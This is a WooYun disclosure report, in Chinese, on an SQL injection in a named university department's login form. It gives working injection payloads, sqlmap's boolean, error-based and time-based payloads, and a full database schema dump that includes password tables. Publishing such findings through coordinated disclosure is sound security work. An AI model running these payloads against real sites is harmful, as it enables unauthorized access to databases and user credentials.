乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-12-20: 细节已通知厂商并且等待厂商处理中 2014-12-22: 厂商已经确认,细节仅向厂商公开 2015-01-01: 细节向核心白帽子及相关领域专家公开 2015-01-11: 细节向普通白帽子公开 2015-01-21: 细节向实习白帽子公开 2015-02-03: 细节向公众公开
注入链接: http://stu.math.sdu.edu.cn/cms/login.php注入参数: username表单提交未对username字段进行过滤,所以引起注入,可获得敏感信息。用户名写入
'having 1=1--
密码随意返回信息是
Error!Description:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1Back:返回
初步判断username字段存在post注入用户名写入,密码随意
admin' union select 1 from (select count(*),concat(floor(rand(0)*2),(select user() limit 0,1))a from information_schema.tables group by a)b#
返回信息是
Error!Description:Duplicate entry '1stu@localhost' for key 'group_key'Back:返回
获得了用户名,接着就上神器sqlmap。。
Place: POSTParameter: username Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: username=admin' AND 4227=4227 AND 'SkxV'='SkxV&password=admin Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: username=admin' AND (SELECT 4781 FROM(SELECT COUNT(*),CONCAT(0x7175677a71,(SELECT (CASE WHEN (4781=4781) THEN 1 ELSE 0 END)),0x7163657071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'NnZN'='NnZN&password=admin Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: username=admin' AND SLEEP(5) AND 'qzHD'='qzHD&password=admin---[09:45:18] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: PHP 5.3.5, Apache 2.2.17back-end DBMS: MySQL 5.0[09:45:18] [INFO] fetching database names[09:45:18] [INFO] the SQL query used returns 3 entries[09:45:18] [INFO] resumed: information_schema[09:45:18] [INFO] resumed: stu_maths[09:45:18] [INFO] resumed: testavailable databases [3]:[*] information_schema[*] stu_maths[*] test
Database: stu_mathsTable: new_subject[9 columns]+------------+--------------+| Column | Type |+------------+--------------+| addtime | datetime || ename | varchar(25) || flag | int(1) || id | int(8) || infomation | mediumtext || name | varchar(100) || picture | varchar(25) || priority | int(10) || url | varchar(100) |+------------+--------------+Database: stu_mathsTable: new_mark[5 columns]+---------------+---------+| Column | Type |+---------------+---------+| a_id | int(10) || id | int(10) || quality_mark | int(5) || quantity_mark | int(5) || u_id | int(10) |+---------------+---------+Database: stu_mathsTable: manage[4 columns]+-------------+-------------+| Column | Type |+-------------+-------------+| names | varchar(20) || col_present | int(11) || id | int(11) || pass | varchar(80) |+-------------+-------------+Database: stu_mathsTable: passage_bak[20 columns]+-----------+------------------+| Column | Type |+-----------+------------------+| addtime | datetime || blockid | int(10) || blockname | varchar(10) || catename | varchar(10) || content | mediumtext || editor | varchar(50) || edittime | datetime || hits | int(11) || info | mediumtext || iscomment | enum('no','yes') || ishtml | enum('no','yes') || keyword | varchar(100) || olink | varchar(255) || picauthor | varchar(25) || pid | int(10) || priority | int(1) || reporter | varchar(50) || state | int(1) || subtitle | varchar(40) || title | varchar(100) |+-----------+------------------+Database: stu_mathsTable: new_passtemp[16 columns]+-----------+--------------+| Column | Type |+-----------+--------------+| addtime | datetime || blockid | int(8) || blockname | varchar(10) || catename | varchar(10) || content | mediumtext || editor | varchar(10) || info | mediumtext || keyword | varchar(50) || olink | varchar(255) || picauthor | varchar(25) || pid | int(10) || reporter | varchar(50) || source | varchar(25) || state | int(1) || subtitle | varchar(40) || title | varchar(100) |+-----------+--------------+Database: stu_mathsTable: new_department[3 columns]+--------+-------------+| Column | Type |+--------+-------------+| id | int(8) || name | varchar(20) || parent | int(3) |+--------+-------------+Database: stu_mathsTable: new_picture[6 columns]+-----------+--------------+| Column | Type |+-----------+--------------+| addtime | datetime || filepath | varchar(150) || id | int(8) || is_passed | tinyint(2) || picposter | varchar(25) || pid | int(8) |+-----------+--------------+Database: stu_mathsTable: new_comment[11 columns]+------------+------------------+| Column | Type |+------------+------------------+| addtime | timestamp || commentid | int(10) unsigned || content | mediumtext || ipaddress | varchar(50) || passageid | int(10) unsigned || replyid | int(10) || replynum | int(10) || replytext | mediumtext || standpoint | int(1) || username | varchar(50) || useros | varchar(250) |+------------+------------------+Database: stu_mathsTable: new_block[9 columns]+-----------+-------------+| Column | Type |+-----------+-------------+| blocktype | int(1) || id | int(2) || isindex | int(1) || ispassage | int(1) || isson | int(1) || name | varchar(30) || orders | int(2) || pagepath | varchar(50) || parent | int(2) |+-----------+-------------+Database: stu_mathsTable: new_links[8 columns]+-------------+-------------+| Column | Type |+-------------+-------------+| in | tinyint(1) || addtime | datetime || description | varchar(20) || flag | int(1) || linkid | int(5) || picture | varchar(50) || sitename | varchar(50) || siteurl | varchar(50) |+-------------+-------------+Database: stu_mathsTable: new_assignment[14 columns]+---------------+------------+| Column | Type |+---------------+------------+| complete | mediumtext || complete_time | date || content | mediumtext || delay | mediumtext || delay_time | date || dp_id | int(8) || end_date | date || flag | int(3) || h_id | int(8) || id | int(8) || re_complete | text || re_delay | mediumtext || re_do | mediumtext || st_date | date |+---------------+------------+Database: stu_mathsTable: diaocha_text[2 columns]+---------+--------+| Column | Type |+---------+--------+| textid | int(3) || titleid | int(3) |+---------+--------+Database: stu_mathsTable: new_column_type[2 columns]+--------+-------------+| Column | Type |+--------+-------------+| id | int(2) || info | varchar(30) |+--------+-------------+Database: stu_mathsTable: new_users[4 columns]+----------+-------------+| Column | Type |+----------+-------------+| id | int(7) || name | varchar(30) || password | varchar(60) || username | varchar(30) |+----------+-------------+Database: stu_mathsTable: app_block[4 columns]+------------+--------------+| Column | Type |+------------+--------------+| blockname | varchar(100) || department | varchar(100) || id | int(2) || message | text |+------------+--------------+Database: stu_mathsTable: new_w_counter[16 columns]+-----------+---------+| Column | Type |+-----------+---------+| b_id | int(5) || Fri | int(8) || Mon | int(8) || move_time | int(11) || pe_fri | int(8) || pe_mon | int(8) || pe_sat | int(8) || pe_sun | int(8) || pe_thu | int(8) || pe_tue | int(8) || pe_wed | int(8) || Sat | int(8) || Sun | int(8) || Thu | int(8) || Tue | int(8) || Wed | int(8) |+-----------+---------+Database: stu_mathsTable: new_message[9 columns]+----------+-------------+| Column | Type |+----------+-------------+| body | mediumtext || id | int(11) || messtype | tinyint(1) || readtime | datetime || receiver | varchar(20) || sender | varchar(20) || sendtime | datetime || shuxing | char(1) || title | varchar(50) |+----------+-------------+Database: stu_mathsTable: get_ip[7 columns]+----------+--------------+| Column | Type |+----------+--------------+| addtime | datetime || content | text || id | int(10) || ip | varchar(20) || reporter | varchar(10) || subtitle | varchar(80) || title | varchar(200) |+----------+--------------+Database: stu_mathsTable: uploadfile[8 columns]+-----------+--------------+| Column | Type |+-----------+--------------+| add_href | varchar(200) || enddate | date || filepath | varchar(100) || filetype | int(2) || id | int(100) || is_used | int(11) || startdate | date || title | varchar(100) |+-----------+--------------+Database: stu_mathsTable: app_application[13 columns]+------------+-------------+| Column | Type |+------------+-------------+| time | date || ability | text || beizhu | varchar(20) || college | varchar(20) || department | varchar(20) || email | varchar(20) || flag | int(2) || gender | int(2) || homepage | varchar(30) || id | int(8) || mobile | int(20) || name | varchar(20) || phone | varchar(20) |+------------+-------------+Database: stu_mathsTable: new_passage_old[20 columns]+-----------+------------------+| Column | Type |+-----------+------------------+| addtime | datetime || blockid | int(10) || blockname | varchar(10) || catename | varchar(10) || content | mediumtext || editor | varchar(50) || edittime | datetime || hits | int(11) || info | mediumtext || iscomment | enum('no','yes') || ishtml | enum('no','yes') || keyword | varchar(100) || olink | varchar(255) || picauthor | varchar(25) || pid | int(10) || priority | int(1) || reporter | varchar(50) || state | int(1) || subtitle | varchar(40) || title | varchar(100) |+-----------+------------------+Database: stu_mathsTable: new_counter[7 columns]+------------+------------------+| Column | Type |+------------+------------------+| month | int(8) unsigned || b_id | int(5) unsigned || now_time | int(11) unsigned || today | int(8) unsigned || total | int(8) unsigned || total_time | int(8) unsigned || yesterday | int(8) unsigned |+------------+------------------+Database: stu_mathsTable: choice[5 columns]+-----------+--------------+| Column | Type |+-----------+--------------+| choice | varchar(100) || extends | int(11) || id | int(11) || IsDefault | set('a','b') || num | int(80) |+-----------+--------------+Database: stu_mathsTable: new_apply_department[5 columns]+-------------+--------------+| Column | Type |+-------------+--------------+| admin_email | varchar(100) || blockname | varchar(100) || id | int(2) || message | mediumtext || remark | varchar(100) |+-------------+--------------+Database: stu_mathsTable: new_blocktype[5 columns]+-------------+--------------+| Column | Type |+-------------+--------------+| blank | int(1) || description | varchar(200) || id | int(8) || name | varchar(20) || style | int(1) |+-------------+--------------+Database: stu_mathsTable: new_topic[8 columns]+------------+------------------+| Column | Type |+------------+------------------+| asset | varchar(255) || disset | varchar(255) || flag | int(2) || neutrality | varchar(255) || passageid | int(10) unsigned || topicid | int(10) unsigned || topicname | varchar(100) || topicurl | varchar(50) |+------------+------------------+Database: stu_mathsTable: new_link[7 columns]+---------+-------------+| Column | Type |+---------+-------------+| in | tinyint(1) || des | varchar(20) || id | int(5) || picture | varchar(50) || text | varchar(50) || type | smallint(3) || url | varchar(50) |+---------+-------------+Database: stu_mathsTable: new_column[6 columns]+-------------+-------------+| Column | Type |+-------------+-------------+| class | int(3) || class1 | int(2) || column_type | int(2) || id | int(5) || info | varchar(50) || name | varchar(50) |+-------------+-------------+Database: stu_mathsTable: pas_basic[11 columns]+--------------+-----------------+| Column | Type |+--------------+-----------------+| blockname | varchar(20) || catename | varchar(20) || comment_flag | tinyint(1) || filepath | varchar(100) || p_id | int(7) unsigned || poster | varchar(20) || priority | tinyint(1) || publishtime | datetime || source | varchar(30) || state | tinyint(1) || title | varchar(200) |+--------------+-----------------+Database: stu_mathsTable: info[1 column]+--------+------------------+| Column | Type |+--------+------------------+| infoid | int(10) unsigned |+--------+------------------+Database: stu_mathsTable: new_pic[16 columns]+-------------+--------------+| Column | Type |+-------------+--------------+| blockname | varchar(20) || body | text || catename | varchar(20) || editor | varchar(20) || flag | int(2) || info | text || p_id | int(10) || picpath | varchar(100) || picposter | varchar(20) || postername | varchar(20) || posttime | datetime || publishtime | datetime || source | varchar(20) || state | int(1) || subtitle | varchar(80) || title | varchar(80) |+-------------+--------------+Database: stu_mathsTable: new_passage[22 columns]+-----------+------------------+| Column | Type |+-----------+------------------+| addtime | datetime || blockid | int(10) || blockname | varchar(10) || catename | varchar(10) || content | mediumtext || dateline | int(10) unsigned || editor | varchar(50) || edittime | datetime || hits | int(10) unsigned || info | mediumtext || iscomment | enum('no','yes') || ishtml | enum('no','yes') || keyword | varchar(100) || olink | varchar(255) || picauthor | varchar(25) || pid | int(10) unsigned || priority | int(1) || reporter | varchar(50) || source | varchar(25) || state | int(1) || subtitle | varchar(40) || title | varchar(250) |+-----------+------------------+Database: stu_mathsTable: new_attachment[7 columns]+-----------+------------------+| Column | Type |+-----------+------------------+| addtime | datetime || filename | varchar(50) || filepath | varchar(200) || filesize | varchar(50) || id | int(10) || passageid | int(10) unsigned || times | int(10) |+-----------+------------------+Database: stu_mathsTable: new_today[4 columns]+---------+-------------+| Column | Type |+---------+-------------+| date | varchar(50) || content | mediumblob || id | int(11) || title | text |+---------+-------------+Database: stu_mathsTable: new_application[13 columns]+------------+-------------+| Column | Type |+------------+-------------+| time | date || ability | text || beizhu | varchar(20) || college | varchar(20) || department | varchar(20) || email | varchar(20) || flag | int(2) || gender | int(2) || homepage | varchar(30) || id | int(8) || mobile | varchar(30) || name | varchar(20) || phone | varchar(20) |+------------+-------------+Database: stu_mathsTable: new_menu[8 columns]+-----------+-------------+| Column | Type |+-----------+-------------+| active | int(1) || attribute | int(1) || filepath | varchar(50) || id | int(2) || name | varchar(20) || orders | int(2) || parent | int(2) || style | int(1) |+-----------+-------------+Database: stu_mathsTable: app_department[4 columns]+-------------+--------------+| Column | Type |+-------------+--------------+| admin_email | varchar(100) || did | int(3) || name | varchar(100) || remark | varchar(100) |+-------------+--------------+Database: stu_mathsTable: new_usertype[7 columns]+-------------+------------------+| Column | Type |+-------------+------------------+| active | enum('yes','no') || description | varchar(100) || id | int(2) || limitarray | mediumtext || menuarray | mediumtext || name | varchar(20) || s_menuarray | mediumtext |+-------------+------------------+Database: stu_mathsTable: new_works[7 columns]+-----------+-------------+| Column | Type |+-----------+-------------+| action | varchar(50) || addtime | varchar(20) || id | int(11) || ipaddress | varchar(20) || passageid | int(8) || script | varchar(50) || userid | int(8) |+-----------+-------------+Database: stu_mathsTable: new_actions[6 columns]+-------------+--------------+| Column | Type |+-------------+--------------+| active | int(1) || description | varchar(200) || ename | varchar(50) || id | int(2) || islog | int(1) || name | varchar(20) |+-------------+--------------+
信息量太大,就不往下进行了。。
过滤
危害等级:中
漏洞Rank:6
确认时间:2014-12-22 09:18
通知用户处理中
暂无
